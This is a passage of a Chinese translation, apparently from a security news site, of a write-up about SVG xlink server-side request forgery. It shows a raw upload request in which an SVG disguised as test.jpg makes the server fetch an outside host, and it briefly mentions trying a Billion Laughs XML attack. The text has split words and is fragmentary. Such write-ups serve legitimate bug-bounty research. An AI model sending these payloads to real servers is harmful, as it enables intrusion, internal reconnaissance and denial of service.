XLink
POST /upload HTTP/1.1 Host: redacted.com Connection: close Content-Length: 1313 Accept: application/json, text/ja vasc ript, */*; q=0.01 Origin: https://redacted.com X-Requested-With: xm lHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryINZ5MzqXAud4aYrN Referer: https://redacted.com Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
ceaa2f2d25275bb5879a726eb8c04aec7b3a64f7 ------WebKitFormBoundaryINZ5MzqXAud4aYrN Content-Disposition: form-data; name="timestamp"
1551244304 ------WebKitFormBoundaryINZ5MzqXAud4aYrN Content-Disposition: form-data; name="api_key"
413781391468673 ------WebKitFormBoundaryINZ5MzqXAud4aYrN Content-Disposition: form-data; name="file"; filename="test.jpg" Content-Type: image/jpeg
<?xm l version="1.0" encoding="UTF-8" standalone="no"?><svg xm lns:svg="http://www.w3.org/2000/svg" xm lns="http://www.w3.org/2000/svg" xm lns:xlink="http://www.w3.org/1999/xlink" width_="200" height="200"><image height="30" width_="30" xlink:href="http://myserver:1337/" /></svg>
http://myserver:1337/
由於解析器會攔截基於SYSTEM的實體,攻擊面受到了限制。是時候測試Billion Laughs attack了。注意:在進行模糊測試前,一定要了解解析器的邏輯,在攻擊之前,我測試了簡單的回調實體函數,看看解析器是否允許通過回調xml2的實體來渲染xml1實體。
本文由白帽彙整理並翻譯,不代表白帽匯任何觀點和立場
來源:利用SVG圖片和SSRF收集伺服器內部信息|NOSEC安全訊息平台 - NOSEC.ORG
原文:https://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c
公司產品:FOFA-網路空間安全搜索引擎、FOEYE-網路空間檢索系統、NOSEC-安全訊息平台。
為您提供:網路空間測繪、企業資產收集、企業威脅情報、應急響應服務。